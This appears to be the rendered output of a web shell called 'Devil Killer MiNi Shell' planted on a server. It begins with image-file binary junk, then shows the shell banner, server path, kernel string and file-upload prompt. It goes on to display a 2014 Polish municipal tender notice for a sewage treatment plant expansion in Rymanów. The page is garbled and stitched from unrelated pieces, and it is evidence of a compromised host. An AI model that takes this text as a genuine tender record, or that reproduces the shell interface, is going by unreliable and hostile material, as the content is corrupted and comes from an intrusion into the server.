JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140904/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140904/294498-N-2014.html

<p class="kh_header"><b>Rymanów: Rozbudowa i modernizacja oczyszczalni ścieków w Rymanowie - 
II etap</b><br>
<b>Numer ogłoszenia: 294498 - 2014; data zamieszczenia: 04.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rymanów , ul. Mitkowskiego 14a, 38-480 Rymanów, woj. podkarpackie, tel. 013 4355006, faks 013 4355765.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rymanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i modernizacja oczyszczalni ścieków w Rymanowie - 
II etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest rozbudowa i modernizacja oczyszczalni ścieków w Rymanowie - II etap, w której zakres wchodzą roboty związane z przebudową mechaniczno-biologicznej części oczyszczalni ścieków. 
Należy wykonać następujące obiekty i instalacje:
OBIEKTY ISTNIEJĄCE DO REMONTU:
- Piaskowniki (ob. nr 3/1 i 3/2),
- Osadnik Imhoffa (ob. nr 5),
- Zbiornik retencyjny (zaadaptowany osadnik wtórny) (ob. nr 7),
OBIEKTY ISTNIEJĄCE DO PRZEBUDOWY:
- Pompownia ścieków i osadów z halą dmuchaw (ob. nr 1),
- Komora rozprężania z kratą schodkową (ob. nr 4/1),
- Porcjowy reaktor biologiczny I (ob. nr 6/1),
OBIEKTY PROJEKTOWANE:
- Piaskowniki (ob. nr 3,3 i 3/4),
- Porcjowy reaktor biologiczny II (ob. nr 6/2),
- Stacja koagulanta II (ob. nr 15/1),
- Stacja zlewna (ob. nr 2/1),
- Filtr powietrza (ob. nr 24),
Łącznie z w/w obiektami należy wykonać przewody między obiektowe oraz instalacje elektryczne oraz instalację AKPiA.
Opis przedmiotu i zakres zamówienia określają załączniki: 
Załącznik nr 9 do SIWZ - Szczegółowy opis przedmiotu zamówienia.
Załącznik nr 10 do SIWZ - Specyfikacja techniczna wykonania i odbioru robót  budowlanych.
Załącznik nr 11 do SIWZ - Dokumentacja projektowa.
Załącznik nr 12 do SIWZ  - Przedmiar robót.
2.  Wymagania dotyczące przedmiotu zamówienia:
a) Ze względu na to, że prace budowlano-montażowe związane z rozbudową i modernizacją oczyszczalni ścieków w Rymanowie etap II odbywać się będą podczas nieprzerwanej jej eksploatacji, w celu zminimalizowania skutków tych prac na sprawność działania oczyszczalni należy przestrzegać określonej w projekcie kolejności robót, w przypadku wątpliwości Wykonawcy co do kolejności wykonywania prac należy, niezwłocznie skonsultować je z Zamawiającym. Wykonawca w czasie wykonywania prac zwróci szczególną uwagę na  niezmienną i ciągła eksploatację oczyszczalni ścieków, o wszelkich trudnościach związanych z eksploatacją obiektu Wykonawca natychmiast zawiadomi o Kierownika i obsługę oczyszczalni ścieków, Inspektora Nadzoru oraz Zamawiającego. 
b) Wszystkie zobowiązania powstałe podczas nieprawidłowej pracy oczyszczalni ścieków związane z  realizacją umowy pokryje w pełnej wysokości Wykonawca. Roboty budowlane będą prowadzone podczas ciągłej pracy oczyszczalni ścieków, eksploatowanej przez Użytkownika. Przerwy technologiczne, np. spowodowane włączeniem nowych urządzeń, należy wcześniej zgłosić pisemnie i uzyskać pisemną zgodę użytkownika i Inspektora Nadzoru  wraz z dopuszczalnym czasem wyłączenia z pracy urządzeń.                                       
c) Roboty oraz zastosowane materiały, maszyny, urządzenia i wyposażenie muszą gwarantować: osiągnięcie wymaganych parametrów technologicznych określonych w dokumentacjach technicznych i STWiORB, dostępność części zamiennych do zainstalowanych w ramach robót maszyn i urządzeń przez okres minimum 5 lat od daty wydania protokołu odbioru końcowego. 
d) Zamawiający informuje, że  na zakończenie Etapu II rozbudowy i modernizacji oczyszczalni ścieków, w cenie oferty należy ująć jeden rozruch technologiczny po zakończeniu całości prac.
3.  Informacje dodatkowe dotyczące realizacji przedmiotu zamówienia 
a) Wymagany okres gwarancji dla przedmiotu zamówienia wynosi 3 lata - na wykonane roboty budowlane, instalacyjne, dostarczone urządzenia i materiały.
b) Wykonawca w trakcie wykonywania robót ponosi odpowiedzialność za bezpieczeństwo   
swoich pracowników oraz innych osób znajdujących się w obrębie przekazanego placu budowy z tytułu prowadzonych robót. 
c) Zamawiający dopuszcza zatrudnienie podwykonawców do wykonania robót. Jeżeli Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcom, należy o tym zamieścić informację w Formularzu Ofertowym - Załącznik nr 1 do SIWZ . Do zawarcia przez Wykonawcę umowy o roboty budowlane z podwykonawcą jest wymagana zgoda Zamawiającego. Jeżeli w terminie 14 dni od przedstawienia przez Wykonawcę umowy z podwykonawcą lub jej projektu, wraz z częścią dokumentacji dotyczącej wykonania robót określonych w umowie lub projekcie, nie zgłosi sprzeciwu lub zastrzeżeń, uważa się, że wyraził zgodę na zawarcie umowy. 
d) Zamawiający zaleca Wykonawcy dokonanie wizji lokalnej na terenie gdzie będą wykonywane roboty oraz uzyskanie na swoją odpowiedzialność i ryzyko wszelkich informacji, które mogą być konieczne do przygotowania oferty. Wszelkie koszty wizji lokalnej ponosi Wykonawca. 
e) Wszelkie koszty mediów (prąd, woda, ścieki) związane z realizacją przedmiotu zamówienia ponosi Wykonawca,
f) Jeżeli w projekcie, przedmiarze robót bądź specyfikacji technicznej wykonania i odbioru robót występują wskazania materiałowe typu znaków towarowych, patentów, nazw własnych lub pochodzenia (producenta), to należy odczytywać je jako przykładowe i służą one określeniu pożądanego standardu wykonania i określeniu właściwości i wymogów technicznych założonych w dokumentacji technicznej dla danych rozwiązań. Dopuszcza się równoważne rozwiązania (w oparciu o produkty innych producentów) na zasadzie zaoferowania parametrów technicznych nie gorszych niż mają opisane produkty. Zgodnie z art. 30 ust. 5 ustawy Prawo zamówień publicznych Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego roboty budowlane spełniają wymagania określone przez Zamawiającego. Wszelkie koszty wynikające z tytułu rozwiązań równoważnych ponosi Wykonawca.
Wykonawca składając ofertę równoważną, w przypadku wygrania przetargu i realizacji zadania, ponosi pełną odpowiedzialność za osiągnięty efekt rozbudowy oczyszczalni ścieków.
Wykonawca oferując produkty równoważne zobowiązany jest potwierdzić, że spełniają stawiane im wymagania, poprzez dołączenie do oferty załącznika nr 13 do SIWZ określając: 
- nazwy producenta lub marki oferowanego produktu, 
- pełnej nazwy produktu,
- jego dokładnego opisu,
Zabrania się stosowania urządzeń prototypowych.
g) Jeżeli w projekcie, przedmiarze robót bądź specyfikacji technicznej wykonania i odbioru robót występują wskazania norm, aprobat, specyfikacji technicznych i systemów odniesienia, Zamawiający dopuszcza rozwiązania równoważne opisywanym (wówczas ciężar udowodnienia równoważności spoczywa na Wykonawcy)
h) wykonawca przed podpisaniem umowy przedłoży Zamawiającemu następujące dokumenty:
- szczegółowy kosztorys ofertowy jako dokument pomocniczy,
- harmonogram rzeczowo - finansowy wykonania zamówienia  - uzgodniony z Zamawiającym,
- zabezpieczenie należytego wykonania umowy,
- uprawnienia osób przewidzianych do realizacji zamówienia.
i) Zastosowane do realizacji przedmiotu zamówienia materiały, dostarczone wyroby i urządzenia powinny odpowiadać co do jakości wymaganiom określonym w dokumentacji projektowej  i posiadać wymagane dla wyrobów dopuszczenia do obrotu i stosowania w budownictwie (ustawa z dnia 16.04.2004 r. o wyrobach budowlanych - Dz. U. Nr 92, poz. 881 ze zm. wraz z rozporządzeniami wykonawczymi). Na każde żądanie Zamawiającego lub Inspektora Nadzoru Wykonawca zobowiązany jest okazać w stosunku do wskazanych urządzeń, materiałów i wyrobów: kartę wyrobu z Aprobatą Techniczną, atest, certyfikat lub deklarację zgodności z Polską Normą, normą UE - w przypadku braku PN lub Aprobatą Techniczną. 
Zamawiający może zażądać przeprowadzenia przez Wykonawcę dodatkowych badań jakości wykonanych robót z materiałów, wyrobów i urządzeń Wykonawcy. Jeżeli okaże się, że wyniki badań potwierdzają zastrzeżenia Zamawiającego co do jakości wbudowanych materiałów, wyrobów, urządzeń bądź wykonanych robót - to koszty badań ponosi Wykonawca. W przeciwnym wypadku koszty tych badań ponosi Zamawiający. Zastosowane wyroby i materiały powinny odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie określonych w art. 10 ustawy Prawo Budowlane oraz wymaganiom dokumentacji technicznej. 
j) Zamawiający informuje, że finansowanie inwestycji w odbędzie się  na następujących warunkach:
- 1 płatność - dnia 31.03.2015r.  w kwocie 1 mln złotych,
- 2 płatność - dnia 30.06.2015r.  w kwocie 2 mln złotych, 
- 3 płatność - dnia 30.09.2015r.  w kwocie 1,4 mln złotych, 
- 4 płatność pozostająca kwota do zapłaty po zakończonym końcowym odbiorze robót.   
k) W przypadku konieczności wykonania robót dodatkowych lub zamiennych rozliczane będą według poniższych zasad: 
Kosztorysy ofertowe Wykonawcy sporządzane będą w oparciu o KNR, a przy braku w KNR odpowiednich pozycji kosztorysowych wg innych katalogów nakładczych, z zastosowaniem składników kalkulacyjnych jak w kosztorysach ofertowych do niniejszego zamówienia tj,
- materiałów wg ofertowych ich cen jednostkowych,
- sprzętu wg ofertowych jego cen jednostkowych,
- stawki rob./godz.zł, 
- kosztów ogólnych od R i S %, 
- kosztów zakupu od M %, 
- zysku od R + S + Ko %,  
oraz:
cen materiałów nie występujących w kosztorysach ofertowych, uzgadnianych każdorazowo z Zamawiającym, lecz nie wyższych niż średnie ceny publikowane w wydawnictwie SEKOCENBUD za kwartał bezpośrednio poprzedzający okres dokonywania wyceny robót, przy czym w przypadku rozbieżności między Stronami co do wysokości zastosowanych cen kalkulacyjnych, rozstrzygające będą ceny wymagane przez Zamawiającego, pod warunkiem wskazania Wykonawcy źródła nabycia  tych materiałów.
Ceny sprzętu nie występującego w kosztorysach ofertowych, uzgodnionych każdorazowo z Zamawiającym, lecz nie wyższych niż ceny publikowane przez wydawnictwo SEKOCENBUD za kwartał bezpośrednio poprzedzający okres dokonywania wyceny robót..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.00-9, 45.23.31.10-0, 45.11.12.00-0, 45.23.10.00-5, 45.20.00.00-9, 45.23.00.00-8, 45.23.20.00-2, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 175 000,00 zł (słownie: sto siedemdziesiąt pięć  tysięcy złotych)
2.	Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy Pzp, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275 ze zm.).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem  na rachunek Zamawiającego:
        Bank Spółdzielczy w Rymanowie, numer: 89 8636 00052001 0000 0475 0025
5.    Wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie 
        uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego  
        potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.
5.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego w sekretariacie pok. nr 11, a kserokopię dokumentu poświadczoną za zgodność z oryginałem należy załączyć do oferty.
6.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których  spełnianie Wykonawca
zobowiązany jest wykazać w sposób szczególny. Ocena  spełnienia warunku zostanie dokonana
na podstawie złożonego oświadczenia -  Załącznik nr 2 do niniejszej SIWZ.
Zamawiający dokona oceny spełnienia  warunku według metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie warunkiem udziału w postępowaniu jest wykazanie przez Wykonawcę, iż wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył jedną robotę budowlaną polegające na budowie i/lub rozbudowie i/lub modernizacji oczyszczalni ścieków o wartości co najmniej 4 000 000,00 złotych brutto (słownie: cztery miliony złotych).  
Przez zamówienia wykonane należy rozumieć: 
- zamówienia rozpoczęte i zakończone w w/w okresie 
- zamówienia zakończone w w/w okresie, których rozpoczęcie mogło nastąpić wcześniej niż w w/w okresie.
Zamawiający dokona oceny spełnienia  warunku według metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których  spełnianie Wykonawca
zobowiązany jest wykazać w sposób szczególny. Ocena  spełnienia warunku zostanie dokonana
na podstawie złożonego oświadczenia -  Załącznik nr 2 do niniejszej SIWZ.
Zamawiający dokona oceny spełnienia  warunku według metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie warunkiem udziału w postępowaniu jest
c.1) dysponowanie przez Wykonawcę na etapie realizacji zadania co najmniej 1 osobą Kierownika budowy posiadającą wykształcenie wyższe oraz uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, posiadającą co najmniej 5-letnie doświadczenie zawodowe oraz prowadzenie jednego zadania inwestycyjnego polegającego na rozbudowie i modernizacji oczyszczalni ścieków. 
c.2) dysponowanie przez Wykonawcę na etapie realizacji zadania co najmniej 1 osobą Kierownika robót sanitarnych, posiadającą wykształcenie wyższe oraz uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, pełniła funkcję kierownika budowy, lub kierownika robót lub inspektora nadzoru posiadającą co najmniej 5-letnie doświadczenie zawodowe oraz prowadzenie jednego zadania inwestycyjnego polegającego na rozbudowie i modernizacji oczyszczalni ścieków 
c.3) dysponowanie przez Wykonawcę na etapie realizacji zadania co najmniej 1 osobą Kierownika robót elektrycznych i AKPiA, posiadającą wykształcenie wyższe oraz uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, pełniła funkcję kierownika budowy lub kierownika robót lub inspektora nadzoru posiadającą co najmniej 5-letnie doświadczenie zawodowe oraz prowadzenie jednego zadania inwestycyjnego polegającego na rozbudowie i modernizacji oczyszczalni ścieków 
Uwaga: Zamawiający dopuszcza łączenie stanowisk kierownika budowy i kierowników robót, jeżeli osoba będzie posiadała wymagane doświadczenie i kwalifikacje określone w SIWZ.
Uwaga: Zamawiający informuje, że posiadane przez osoby, o których mowa powyżej uprawnienia w wymaganym zakresie, stosownie do wymagań określonych w ogłoszeniu i SIWZ powinny być zgodne z ustawą z dnia 7 lipca 1994r, Prawo budowlane (Dz. U. z 2013 r., poz. 1409 z późn. zm.) oraz aktualnym obowiązującym rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. nr 83 z 2006r., poz. 578). Osoby, które posiadają uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994r. Prawo budowlane, uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego odpowiednie do realizacji przedmiotu zamówienia, do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie wykazują te dokumenty, jako obowiązujące.
Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza, odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (Dz. U. z 2013 r., poz. 1409 z późn. zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2008 r., Nr 63, poz. 394), a także w sytuacji określonej w art. 20 a ustawy z dnia z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. 2001, nr 5 poz. 42 ze zm.).
W przypadku zaproponowania osób wchodzących w skład kadry kierowniczej, które nie znają języka polskiego, Wykonawca powinien zapewnić tłumacza.
Zamawiający dokona oceny spełnienia  warunku według metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie warunkiem udziału w postępowaniu jest: 
posiadanie środków finansowych lub zdolności kredytowej w wysokości  nie mniejszej niż 
3 000 000,00 PLN (słownie: trzy miliony złotych) .
Zamawiający dokona oceny spełnienia  warunku według metody spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

